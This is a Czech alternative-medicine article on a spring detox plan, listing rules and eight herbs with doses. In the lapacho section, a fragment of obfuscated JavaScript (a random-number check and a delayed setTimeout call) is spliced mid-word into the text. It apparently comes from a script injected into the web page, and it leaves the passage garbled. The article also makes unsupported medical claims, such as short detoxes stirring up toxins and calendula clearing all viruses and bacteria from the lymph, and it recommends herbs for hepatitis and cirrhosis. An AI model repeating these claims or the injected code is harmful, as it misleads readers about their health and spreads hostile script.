Alternativní medicína,  Bylinky,  Rady a tipy,  Recepty,  Zdraví

Základy správné detoxikace – snadno a (hlavně ne) rychle

Začíná jaro. Dny se prodlužují a v nás se pomaličku začíná probouzet energie, která v zimě dřímala někde hluboko uvnitř našeho organismu. Mnohdy přestáváme mít chuť na těžká jídla a sem tam už v jídelníčku pokukujeme po něčem čerstvém. Je jaro – čas detoxikace. Pokud máte v plánu pustit se do jarní detoxikační kúry nebo prostě chcete svému tělu odlehčit, je dobré znát základní pravidla, abychom si nezpůsobili víc škody než užitku. Základní informace pro nás srozumitelně shrnula naturopatka Katka Boesenberg.

Základní pravidla detoxikace
I detoxikace, aby měla smysl a organismus se řádně očistil, má několik základních pravidel.

  1. Délka detoxikace: Je důležité si uvědomit, že se organismus nedokáže pročistit během týdne nebo 10 dní. A to ani za pomoci doplňků stravy. Krátké detoxikace spíše rozvíří usazené toxiny a může se nám přitížit. Správná detoxikace organismu trvá zhruba 8 týdnů, ať se děje, co se děje. Může trvat i déle. Obecné pravidlo zní, že pokud se jedná o vaši první očistu, tak za každých 10 let se počítá jeden měsíc čištění.
  2. Pokud detoxikujete, měli byste to dělat cíleně. Je dobré začít tím orgánem/soustavou, která vás nejvíce trápí, a postupně pročistit i ostatní.
  3. Strava během detoxikace je velmi důležitá. Pokud budete organismus zbytečně zatěžovat nevhodnými potravinami (káva, alkohol, smažené, nadbytek masa, výrobky z bílé mouky atd.), čištění půjde pomaleji a výsledky nebudou tak znatelné. Měli byste konzumovat dostatek ovoce a zeleniny. Pamatujte si, že zelenina nemusí nutně být v syrovém stavu, pokud vás nadýmá.
  4. Detoxikace by měla být příjemná a ne za trest. Je sice pravda, že první týden můžete být více unavení, nebo vás může bolet hlava, ale tyto příznaky rychle odezní. I přesto, že jednodenní půst může být pro některé jedince vhodný, během detoxu byste neměli mít hlad nebo se v jídle omezovat. Důležitý je výběr potravin, ne snižování jejich množství.
  5. Jako pomocníci při očistě organismu jsou nejvhodnější bylinky. Pokud si nejste jistí které vybrat, seznamte se s následujícími. Můžete je užívat jednotlivě i v kombinaci.

Detoxikační bylinná osmička
Lapačo červené
Lapačo je skvělá imunitní léčivka, která působí také na zažívací trakt. Používá se při rekonvalescencích, únavových stavech a slabosti – je tedy na jarní očistu ideální. Specifické působení vykazuje při nadýmání, plynatosti, dále při kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidách a mykózách.
1 lžička sušené byliny 1-3x denně

Hořec žlutý
Jak už název napovídá hořec je hořčina.  Jedna  z nejlepších. Plynatost, nechutenství, slabý žaludek (a to hlavně po ránu) či zápach z úst mohou být indikací, že je potřeba podpořit trávení a tvorbu žaludečních šťáv. Hořec je doporučován i u alergických projevů, které mají velice často svůj původ právě v zažívání. Buďte však opatrní s dávkováním – hořec je velmi silná léčivka, používá se v nízkém množství a není vhodná pro ty, kteří mají akutní zánět nebo vřed v zažívacím traktu.
3-10 kapek tinktury do trochy vody, 20 minut před jídlem

Meduňka lékařská
Meduňka, po které dostal náš časopis jméno, je jednou z nejlepších léčivek na zažívací trakt a nervový systém obecně. Používá se při nervové slabosti a vyčerpání, kdy jsou zažívací problémy spojené s nervovým vypětím. Pomáhá při nespavosti, pocitech úzkosti či strachu. O jejím zařazení do očisty střev můžete uvažovat při dyspepsiích (trávicích problémech obecně) či plynatosti a syndromech dráždivého střeva. Meduňka je regulační, hojivá a uklidňující – a to jak pro nervovou soustavu tak i pro zažívací trakt.  
1lžička sušené byliny 1-3x denně

Ostropestřec mariánský
Ostropestřec mariánský je jaterní jednička. Jako antioxidant a hepato-tonikum tonizuje, chrání a regeneruje játra. Tradičně se používá při jaterní a žlučníkové nedostatečnosti (hepatitida, cirhóza, toxicita) nebo po (ale i při) nadměrné konzumaci alkoholu. Při detoxikaci ostropestřec pročišťuje játra i žlučník a pomáhá regulovat nedostatečné vylučování žluči a zvýšený cholesterol.  
Tinktura 20 kapek 3x denně

Smetanka lékařská – kořen a list
Smetanka lékařská, tradiční jaterní detoxikační bylina, by v žádné detoxikaci neměla chybět. Odvar z kořene smetanky se popíjí pravidelně během celé detoxikace v odpoledních hodinách. Kořen je specifický pro regulaci jaterní funkce a žlučníku, žlučových kamenech a písku, při zácpách a dyspepsiích.
List smetanky pročišťuje ledviny a lymfatický systém. Je vhodný při otocích nohou nebo při zadržování vody. Výhodou listu smetanky jako diuretika je to, že neztrácíte cenný draslík. Proto čaj z listů smetanky mohou i lidé, kteří berou léky na srdce a vysoký krevní tlak, případně ti, kteří užívají diuretické léky předepsané lékařem.
Kořen: 1lžička odpoledne
List: 1 lžička 1-3x denně

Měsíček lékařský
Měsíček hojí, je protizánětlivý a čistí lymfatický systém a krev. Pokud vás zlobí premenstruační syndrom nebo bolestivá menstruace, akné, kožní problémy, trpíte otoky nebo nadýmáním, tak by měsíček ve vaší detoxikační receptuře neměl chybět. Měsíček je jemný, ale čistí dobře. Z lymfatického systému vytáhne veškeré staré nečistoty, viry a bakterie.
1lžička sušené byliny 1-3x denně

Kopřiva dvoudomá list
List kopřivy skvěle čistí krev a lymfatický systém, reguluje hladiny krevního cukru. Je indikována při akné, ekzémech, bolestivých kloubech či dně.
1lžička sušené byliny 1-3x denně

Čekanka obecná
Čekanka by se dala považovat za univerzální detoxikační léčivku. Působí totiž na skoro všechny orgánové soustavy. Je vhodná při nedostatečnosti žlučníku i jater, pří zánětech zažívacího traktu, plynatosti nebo dyspepsii, při zápachu z úst či nechutenství, pročišťuje ledviny i lymfu, je vhodná při ledvinovém písku. Stimuluje metabolismus a látkovou výměnu, pomáhá při hubnutí.
1lžička sušené byliny 1-3x denně
Pokud trpíte na studené ruce a nohy – můžete si přidat i trochu zázvoru nebo skořice, které prohřívají. Pozor na nadměrnou konzumaci zázvoru– může způsobit řidší stolici.

Detoxikace by měla být součástí našeho ročního cyklu. Dva měsíce v roce, kdy se o své tělo opravdu staráme, hýčkáme ho dobrým jídlem a bylinkami. A nezapomeňte si během detoxikace dojít na manuální lymfatickou drenáž, na masáž, do sauny nebo přečíst oblíbenou knížku. Ať se vám toto období, kdy se věnujete sami sobě více než jindy, líbí!